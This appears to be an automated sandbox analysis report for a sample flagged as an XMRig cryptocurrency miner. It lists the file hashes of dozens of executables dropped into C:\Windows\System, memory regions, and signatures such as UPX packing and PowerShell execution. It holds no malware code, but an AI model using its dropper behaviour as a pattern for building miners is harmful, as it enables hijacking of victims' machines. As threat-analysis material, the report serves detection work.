SHA512 56042c51f912a8fecde99d9aea84666f7ab639f61fe4312a6a1458c07afb6a721f80fbbc9cf717d7220a4d1fde1874251fc4306fc165e243ce3c07bdda9e9ee0

C:\Windows\System\pORfgZg.exe

MD5 b108b6bb9d639a0cf8f14db9fe2e3fac
SHA1 b74fb2daba2609ac67f50deb69c075cc95645338
SHA256 b99643f61660943b1bb1a3885e2e8d96866ec70365a6a370ab9dcb27f7f8b887
SHA512 0e9db4d2b40a44f4dbfe03a8a07c5348fb80e3e1bfeb376cf46c0a169da6a682b701b907a6b40bceec3a59431b9efca87228f17676d00c0f4b45477177049445

C:\Windows\System\EMTNkDj.exe

MD5 8995303341d91608f149e98c50568072
SHA1 41133a2fa4a586e864efd9bc1a6f7f4084cba47c
SHA256 b55ee1c21cb94b1b88e5e3317990731b581b661d2a6ca1595b9730e780942c5e
SHA512 9c9b6f9bcc3ae236356dc7834cfffd380dcf09385a20df295fa416b9dcaf020e783581faafd854d080e4f5241951f594d89841b5833451e8c3758d80dadbea48

memory/2080-113-0x00007FF620800000-0x00007FF620BF6000-memory.dmp

C:\Windows\System\cJHRFOf.exe

MD5 acfacfc0f5bd91f4136ed17dffe2dfd9
SHA1 5aa501d9a150e0f3b166e824a3023762c6432a04
SHA256 414d06fd853710fc75feb0d01f868ef78429f347f01bcae346907273fdf24869
SHA512 5630c5ca7604f4c22973992462bed15a0e42dc82332df65f8d144803c2a84919998dcd001947b2c9d5eafffc4b834967ab30b1ae125459e889d57fb68412e103

C:\Windows\System\xuaHwvm.exe

MD5 b4f332d6b24cb58c982b02c5d184ad19
SHA1 0b47ccee2a2e561f6d6d79459bc9254b6046b8ab
SHA256 6304ab8a6a6f187c5b5cc4eded7faaa87da6ede41e92ee650c5314953846515d
SHA512 0366b08e3a87dd951c0d2e069a82b9587bfead1cf6c4fb6a34445c272f094afe494cacbdbf2ffb5383df0c2b88c34e646a015e87eba77e424e13361839a65915

C:\Windows\System\qNCjLsp.exe

MD5 c37e2552f13340a61a8c36fe44567eec
SHA1 1ca238f1a5e3e5345984b9f725a47577c745349c
SHA256 4f752c55d9e421617befddfeae330124b2002fb5bb674c8a05adca2cf1adf5b7
SHA512 733ea90241d6b7d2fd4f9cee3d4775e1e60165e5f0908748f0ad197779952561ee62243c94366a62cbeb39904df4247b830b05c5fd47993934516569876aa6e9

C:\Windows\System\dhSpIZl.exe

MD5 da38ea44bef29ebde61d637a2b590088
SHA1 1d32fbc3f2fa5b63240b802c6550fd88fff09abc
SHA256 45e8078e7303185bf1e030461e8f18b162249e5133e0b5a2abbda09afc33a88e
SHA512 d8754f5311851c84cfd88e0cd83ca00417021ffe687936d96f962d3bf1ff3f104a37107178f0d5ed81589c4c66a2c13b3ca975b36e496a3bb673af08a5d51924

C:\Windows\System\FKFTSzm.exe

MD5 823d216f5b557404c43ca66178dcbfa3
SHA1 b5381d015c7fe4e7e59cb37038e2c80fa12a4b12
SHA256 98eb01961956a6a71dbe2c8daab00f3c523e4882ccacfec85ab91a3582e36daf
SHA512 ff5663c1ed94a4c3040915a20618a054fbe0c6aae952ba8ef29cdbc93446041fdfc3f3ed9c8d79481a833447e9d174a1d097a48e13862c295123fb5cc59c5761

C:\Windows\System\DTGNfwP.exe

MD5 72879f6f098eeb0afe5bb33d8aa997d4
SHA1 3d98ba1d94e501c342e02dbada77110b7f7a99e0
SHA256 6b3d0238f638975155c0d12b4cae92058f1a3cec8609e8e403d6a1403dd4de23
SHA512 80eb85d17616cb3cb29a524d0085967444f7d407153205ffa7960f5de5e26455ea38aa59819ae310d3c0f7f6864fa84e843f27b908e3cfe367609c19bb223850

C:\Windows\System\BkmpRoh.exe

MD5 1e85b04baff064ebeb031119589aaf0c
SHA1 06150a5d50cb7d734ccf804bbd5b1b3b62cef9d7
SHA256 69a1576b575178a98bac558f9e4b8b2d331bcc9d526cf397ba5d6c0a965da435
SHA512 65022ed74f40d244f60b8f35ad31b412d42be59d67f84bf106d02fbb804a251e68edec32120b0fcc4ffa1c2035bffe5c1975ee26f5d43c29674fef403d533d66

memory/4172-696-0x00007FF6593C0000-0x00007FF6597B6000-memory.dmp

memory/4584-697-0x00007FF733FB0000-0x00007FF7343A6000-memory.dmp

memory/872-698-0x00007FF7FD570000-0x00007FF7FD966000-memory.dmp

C:\Windows\System\LkhSFoW.exe

MD5 d2b4282bbe637a5c3c95d752b815bd9d
SHA1 0fdc27af3fb339f2ee3203f0e4f570e421fec01a
SHA256 aaa2c772dd312d0170cdff483877bed2159d02da133d1264c8aefd961361ca7d
SHA512 51ccd96896218396d52f7d668074f2fd6c9da381df4a43825c6cdd52cec8c4edffdeecff1d9958ec066f919651c1fcd732f3e9a51eba62d44b6dd9788e49245c

C:\Windows\System\AMqpqYw.exe

MD5 12510adfafe0d0438b614590900dcb4f
SHA1 14a30b9ec464ecda52de1ba38ec5a958f6bdafdf
SHA256 19293e9cd538502b7f47a9fc917c02bea145f897f70d7d57987219876f81879d
SHA512 eee9ccc335c0247c4cce716d8e3401c5af5b6353e4996cb354ba79f29cae803e2277e07071f180b4badac00f4aaa44f758a718ddc17eda5f0a9afd9f506908a1

C:\Windows\System\fmAvSbw.exe

MD5 a93cf174e9340a59d880f1ae9d13c347
SHA1 895afd52d7949c29b6ddfd6c10642f4d74e0cdf0
SHA256 ea29edb4dfb9833f9f2d971b59c99c9e5e7980b29f956e28cd033afe57b21e86
SHA512 4e67206af1c1926e2e00fa90831e7caf267cc8d2542368dfec3315c804c86e09ce6930bcf277b9b2cedd7c9e5f40ff540c9f2ad449b0227afc50d62f83737a5e

memory/412-699-0x00007FF665B20000-0x00007FF665F16000-memory.dmp

C:\Windows\System\olMQlKv.exe

MD5 6fc161792a51681899d2b104ffd481c8
SHA1 c9a50bdd6326988ec743cd63bc553a485c9f2113
SHA256 7db3bb7a4ebd14080f105bea1696f249b8376d04c81ff337bc46fd4bf82d5f75
SHA512 f723de1a62e750c2022d0c3d7ea13db5f18dc5c19953026fa5ef84acebd27bbb73a3a7c244ef87aac777cd6599e5c672e74d6e66b123417e9480df82c502ee57

C:\Windows\System\gOrqmJB.exe

MD5 dd08911e80bf695e0e89883f608bec97
SHA1 c498adb1cf54d5435c4c450dcad7e6d255ce6dc9
SHA256 e5b998fe686ccea27c5ff3d84bbd227099952de4e610eb073e0b006d8078c899
SHA512 e88a3d071ba18bc66218f7c7add9b7b3d2f6f2f8e9dd1d01addd9e1287ce5fa51b48b9fdf0f319aeb6d64048f655a15df0169d3eed6352ffe276191ead3c8c17

C:\Windows\System\pGoRTCY.exe

MD5 6634073bd08972d806a99e0c835f9256
SHA1 446cfccc9356192f39eb0bfbe9ce634b46bf7406
SHA256 70d658d14608dae35ea80bad25de4498990ff50a05ffc833feb3f0fddc2bb56c
SHA512 0e0da5e857a71bd7f81b314567aae5241a0a9f91eafe9430f519a10e24dec8a3d1db3f73e1444fc50f3f7e60f3037761e5a184918f42819e6a9b75a12ba11628

C:\Windows\System\BCtPdAN.exe

MD5 942237913687497dd88938171d06dae7
SHA1 9d7347e78cdeb31b74e4927f991c60d74503c335
SHA256 0bd0937e5dfe377e8d3ade3664f6aa06d05317ea711618edcb535906538bff19
SHA512 fbdf51363012567f4f71066e09f2cb72314cd7349f2a1e7e7356009eb13ed552117ed55122d2e6037d537d7ef07a4beee89ce643ef08b5bd70d0be5d9107d4df

C:\Windows\System\gKtcUYG.exe

MD5 1616d1128af0d2a36c252138ef429634
SHA1 6ea483508ad6d67cfc27751f4440fbec90adeefa
SHA256 855feb1600b6b492e581c4808b450f351f4701d63a5522263236540758ec0724
SHA512 9857f664515f1fcf06e7328d3370a2d2842e46424c1fe89f0fdb2d1c2d1ee591fde64f866d946b6a65ec87b8b884582776bbc306d64ff8137bd10798880ead4f

C:\Windows\System\ruBTdYh.exe

MD5 04052cde0f75f4da81a001834dc31ea9
SHA1 894583b079b870ca93a9b8b9e7a98c9c760600ee
SHA256 15909bf0a4ff6db832ea942e645c58a19f8b2cde1ff248f0884876b1e0ef90b4
SHA512 76b7a642d86e7dbe11ccb82137f7fbff2daa7ed32664b86f92ff1f36e1d76d36eb6180a01b7bf234d965fd4e55aa9269f7c7740c0a01f03f61665ea2c048a68f

C:\Windows\System\lxezhLA.exe

MD5 dd7763f39a1040c128a98eadee216997
SHA1 a606c95ca5cf498590503f22c6e80be0ec6d1445
SHA256 dc320f9e2fafa68497a8f05df5d297363a84d09fd0c158544207234f4a62b32f
SHA512 8babb66333800eb29346c053bfc821c703d907a02b87e5b66ed55751a8a03c78ac748fb0c8281b7101e6413ea9089d201cdb71415f50dfffb2a444077cef74f7

memory/4520-114-0x00007FF757E00000-0x00007FF7581F6000-memory.dmp

C:\Windows\System\Vgtrjlz.exe

MD5 ddf1c8c7d531548bb730bbb6541442b7
SHA1 865c4f36aa477a7587936a863f06b1bed5b7d7ed
SHA256 742557aae54b7068f53976b41e9f3f75b064ae05528e127909f4ee874fd59af2
SHA512 f360ed51c0823cab13d46eec6042cb69470492bc7b1e7bfad626c90020cc70d226c781278a94f3d066cc7f5592a6a9c4b828a05e55da85ff84ecb954262aa6ea

C:\Windows\System\rfqnVcU.exe

MD5 1356ca92db621cb75bb982223591cd28
SHA1 942563e327578a039964f95b85c490db284fa100
SHA256 b96bea31637862ededcfa08ea25cd545359cef014187e1b21f99dc91e62b953b
SHA512 ff45d97e48d87410f66c4fcd38686fd2083e59bdff3c7ceba834b49996f2de2c366a6b1173564c6006f57355b834885ac3b6abd89775c3bb5f75e252184a8574

memory/4700-96-0x00007FF7086E0000-0x00007FF708AD6000-memory.dmp

memory/1672-93-0x0000014A6D900000-0x0000014A6E0A6000-memory.dmp

memory/1712-712-0x00007FF64D770000-0x00007FF64DB66000-memory.dmp

memory/3352-711-0x00007FF726C10000-0x00007FF727006000-memory.dmp

memory/3084-720-0x00007FF64B7F0000-0x00007FF64BBE6000-memory.dmp

memory/4556-724-0x00007FF629B50000-0x00007FF629F46000-memory.dmp

memory/5060-703-0x00007FF68D370000-0x00007FF68D766000-memory.dmp

memory/2848-1403-0x00007FF72D1A0000-0x00007FF72D596000-memory.dmp

memory/1672-2119-0x00007FFEEEFA3000-0x00007FFEEEFA5000-memory.dmp

memory/1672-2120-0x00007FFEEEFA0000-0x00007FFEEFA61000-memory.dmp

memory/4968-2121-0x00007FF7ABA00000-0x00007FF7ABDF6000-memory.dmp

memory/2080-2122-0x00007FF620800000-0x00007FF620BF6000-memory.dmp

memory/4172-2123-0x00007FF6593C0000-0x00007FF6597B6000-memory.dmp

memory/3492-2124-0x00007FF737DF0000-0x00007FF7381E6000-memory.dmp

memory/4840-2125-0x00007FF678940000-0x00007FF678D36000-memory.dmp

memory/3428-2126-0x00007FF777960000-0x00007FF777D56000-memory.dmp

memory/804-2127-0x00007FF7B8C40000-0x00007FF7B9036000-memory.dmp

memory/368-2130-0x00007FF7C1270000-0x00007FF7C1666000-memory.dmp

memory/4772-2129-0x00007FF6A1220000-0x00007FF6A1616000-memory.dmp

memory/1244-2128-0x00007FF6622A0000-0x00007FF662696000-memory.dmp

memory/1164-2134-0x00007FF787740000-0x00007FF787B36000-memory.dmp

memory/704-2135-0x00007FF6D7EF0000-0x00007FF6D82E6000-memory.dmp

memory/4932-2133-0x00007FF71E010000-0x00007FF71E406000-memory.dmp

memory/4204-2132-0x00007FF73B9B0000-0x00007FF73BDA6000-memory.dmp

memory/4968-2131-0x00007FF7ABA00000-0x00007FF7ABDF6000-memory.dmp

memory/4700-2136-0x00007FF7086E0000-0x00007FF708AD6000-memory.dmp

memory/4520-2137-0x00007FF757E00000-0x00007FF7581F6000-memory.dmp

memory/2080-2138-0x00007FF620800000-0x00007FF620BF6000-memory.dmp

memory/4172-2140-0x00007FF6593C0000-0x00007FF6597B6000-memory.dmp

memory/3084-2139-0x00007FF64B7F0000-0x00007FF64BBE6000-memory.dmp

memory/4556-2142-0x00007FF629B50000-0x00007FF629F46000-memory.dmp

memory/4584-2141-0x00007FF733FB0000-0x00007FF7343A6000-memory.dmp

memory/412-2147-0x00007FF665B20000-0x00007FF665F16000-memory.dmp

memory/3352-2146-0x00007FF726C10000-0x00007FF727006000-memory.dmp

memory/5060-2145-0x00007FF68D370000-0x00007FF68D766000-memory.dmp

memory/1712-2144-0x00007FF64D770000-0x00007FF64DB66000-memory.dmp

memory/872-2143-0x00007FF7FD570000-0x00007FF7FD966000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 08:37

Reported

2024-06-13 08:40

Platform

win7-20240611-en

Max time kernel

150s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\JNjawlY.exe N/A
N/A N/A C:\Windows\System\zkvquNG.exe N/A
N/A N/A C:\Windows\System\ohQpMmK.exe N/A
N/A N/A C:\Windows\System\VzRiJoZ.exe N/A
N/A N/A C:\Windows\System\ZASDHLY.exe N/A
N/A N/A C:\Windows\System\hkAJvxn.exe N/A
N/A N/A C:\Windows\System\NTirKXC.exe N/A
N/A N/A C:\Windows\System\IoPasPV.exe N/A
N/A N/A C:\Windows\System\RfZqoFO.exe N/A
N/A N/A C:\Windows\System\vXeLESQ.exe N/A
N/A N/A C:\Windows\System\YhrpLxc.exe N/A
N/A N/A C:\Windows\System\pORfgZg.exe N/A
N/A N/A C:\Windows\System\rfqnVcU.exe N/A
N/A N/A C:\Windows\System\lxezhLA.exe N/A
N/A N/A C:\Windows\System\cJHRFOf.exe N/A
N/A N/A C:\Windows\System\DQdwpES.exe N/A
N/A N/A C:\Windows\System\EMTNkDj.exe N/A
N/A N/A C:\Windows\System\Vgtrjlz.exe N/A
N/A N/A C:\Windows\System\xuaHwvm.exe N/A
N/A N/A C:\Windows\System\qNCjLsp.exe N/A
N/A N/A C:\Windows\System\ruBTdYh.exe N/A
N/A N/A C:\Windows\System\dhSpIZl.exe N/A
N/A N/A C:\Windows\System\gKtcUYG.exe N/A
N/A N/A C:\Windows\System\BCtPdAN.exe N/A
N/A N/A C:\Windows\System\FKFTSzm.exe N/A
N/A N/A C:\Windows\System\pGoRTCY.exe N/A
N/A N/A C:\Windows\System\gOrqmJB.exe N/A
N/A N/A C:\Windows\System\olMQlKv.exe N/A
N/A N/A C:\Windows\System\DTGNfwP.exe N/A
N/A N/A C:\Windows\System\AMqpqYw.exe N/A
N/A N/A C:\Windows\System\fmAvSbw.exe N/A
N/A N/A C:\Windows\System\BkmpRoh.exe N/A
N/A N/A C:\Windows\System\LkhSFoW.exe N/A
N/A N/A C:\Windows\System\fVWTzSF.exe N/A
N/A N/A C:\Windows\System\BsmHOnf.exe N/A
N/A N/A C:\Windows\System\zxGFZum.exe N/A
N/A N/A C:\Windows\System\TDziNYZ.exe N/A
N/A N/A C:\Windows\System\VFsHomq.exe N/A
N/A N/A C:\Windows\System\iHvrKSc.exe N/A
N/A N/A C:\Windows\System\iBvLcwS.exe N/A
N/A N/A C:\Windows\System\yoHotwJ.exe N/A
N/A N/A C:\Windows\System\XYwUrAU.exe N/A
N/A N/A C:\Windows\System\HqkwFGh.exe N/A
N/A N/A C:\Windows\System\WFQCKlQ.exe N/A
N/A N/A C:\Windows\System\EIEcLPt.exe N/A
N/A N/A C:\Windows\System\jUoFdnL.exe N/A
N/A N/A C:\Windows\System\yiZvGln.exe N/A
N/A N/A C:\Windows\System\BwEicrA.exe N/A
N/A N/A C:\Windows\System\rSgLWSO.exe N/A
N/A N/A C:\Windows\System\rgikvRZ.exe N/A
N/A N/A C:\Windows\System\YMtkUqi.exe N/A
N/A N/A C:\Windows\System\UjJdmiD.exe N/A
N/A N/A C:\Windows\System\TZxHZJu.exe N/A
N/A N/A C:\Windows\System\qXvnsNr.exe N/A
N/A N/A C:\Windows\System\AYqJGee.exe N/A
N/A N/A C:\Windows\System\FPMsKdj.exe N/A
N/A N/A C:\Windows\System\mvJYIbG.exe N/A
N/A N/A C:\Windows\System\VgTDxJU.exe N/A
N/A N/A C:\Windows\System\vvpaPqW.exe N/A
N/A N/A C:\Windows\System\MWIrnNw.exe N/A
N/A N/A C:\Windows\System\WXwkEpJ.exe N/A
N/A N/A C:\Windows\System\TRpPPXD.exe N/A
N/A N/A C:\Windows\System\RnEvGFv.exe N/A
N/A N/A C:\Windows\System\pEYaYrm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\CjkHhOI.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qzMvjLT.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lBzaqCP.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iFfbLht.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bEQSoAd.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IaIYAPr.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hHtdsMh.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DBAOGCg.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IgDuEup.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rtxyDFn.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xTXzVtK.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FDjbBNI.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wExmeZE.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
